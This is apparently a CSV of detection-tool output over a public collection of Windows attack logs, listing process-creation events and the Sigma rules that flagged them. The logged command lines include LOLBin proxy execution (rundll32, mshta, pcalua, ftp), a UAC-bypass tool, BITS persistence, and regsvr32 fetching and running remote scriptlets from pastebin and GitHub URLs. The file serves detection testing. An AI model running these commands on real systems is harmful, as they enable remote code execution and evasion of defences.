Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: 